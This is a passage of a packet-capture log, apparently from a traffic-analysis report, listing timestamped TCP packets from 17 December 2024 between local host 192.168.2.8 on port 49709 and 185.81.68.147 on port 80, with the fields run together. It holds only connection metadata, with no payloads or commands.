                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.331612110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.332606077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.332618952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.332861900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.333374023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.333444118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.333547115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.334450960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.334462881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.334526062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.335360050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.335412979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.335472107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.336209059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.336262941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.336324930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.337261915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.337274075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.337416887 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.338113070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.338125944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.338351965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.339133978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.339145899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.339334965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.339998007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.340219021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.340675116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.340925932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.341149092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.341339111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.341888905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.341988087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.342070103 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.342895985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.342947960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.343045950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.343981028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.343992949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.344099998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.344755888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.344769001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.344995022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.345705032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.345994949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.346226931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.346673012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.346724987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.347333908 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.347744942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.347758055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.348123074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.348593950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.348829031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.348932028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.349533081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.349637985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.349769115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.350477934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.350550890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.350667000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.351474047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.351567030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.351629019 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.352648020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.352658987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.352766037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.353286028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.353338957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.353425980 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.354290962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.354362965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.354661942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.355221033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.355359077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.355405092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.356389046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.356401920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.356452942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.357409000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.357564926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.357702971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.358485937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.358572006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.358766079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.359060049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.359208107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.359318018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.360009909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.360102892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.360148907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.361093044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.361104965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.361211061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.361989975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.362001896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.362195969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.362984896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.362997055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.363245964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.363873005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.363944054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.364037037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.364746094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.364841938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.364931107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.365793943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.365804911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.365878105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.367031097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.367043018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.367109060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.367643118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.367801905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.367886066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.368673086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.368699074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.368818045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.369755030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.369766951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.369946957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.370740891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.370753050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.371573925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.371675968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.371726036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.371809006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.372567892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.372579098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.372747898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.373686075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.373697996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.373830080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.374371052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.374444008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.374500036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.375379086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.375442982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.375581026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.376569986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.376583099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.376785040 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.377141953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.377238035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.377305031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.378413916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.378426075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.378514051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.379030943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.426173925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.521418095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.521517038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.521933079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.521956921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.522471905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.522630930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.523370981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.523384094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.523427010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.523930073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.523946047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.524195910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.524632931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.524843931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.524979115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.525630951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.526002884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.526093960 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.526721001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.526731968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.526979923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.527542114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.527812958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.528055906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.528428078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.528539896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.528583050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.529458046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.529476881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.529586077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.530601978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.530780077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.530828953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.531352997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.531472921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.531517982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.532433987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.532447100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.532494068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.533298969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.533417940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.533509970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.534162045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.534336090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.534455061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.535116911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.535367966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.535553932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.536072969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.536220074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.536761999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.536993980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.537147999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.537190914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.537988901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.538060904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.538155079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.538949966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.539366007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.539540052 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.539932966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.539993048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.540112972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.540992975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.541009903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.541136980 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.541860104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.541979074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.542057991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.542709112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.543045998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.543257952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.543735981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.543802023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.543873072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.544727087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.544851065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.544955969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.545661926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.545720100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.545883894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.546606064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.546730042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.546793938 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.547683954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.547696114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.547763109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.548474073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.548650026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.548703909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.549597025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.549608946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.549665928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.550623894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.550636053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.550692081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.551352978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.551743984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.551826954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.552789927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.552802086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.552884102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.553859949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.553877115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.553955078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.554999113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.555011988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.555330992 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.555351973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.556051970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.556344032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.556355953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.556456089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.556456089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.557043076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.557117939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.557214022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.557969093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.558140039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.558267117 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.559209108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.559221029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.559283018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.560313940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.560326099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.560373068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.561403036 CET8049709185.81.68.147192.168.2.8
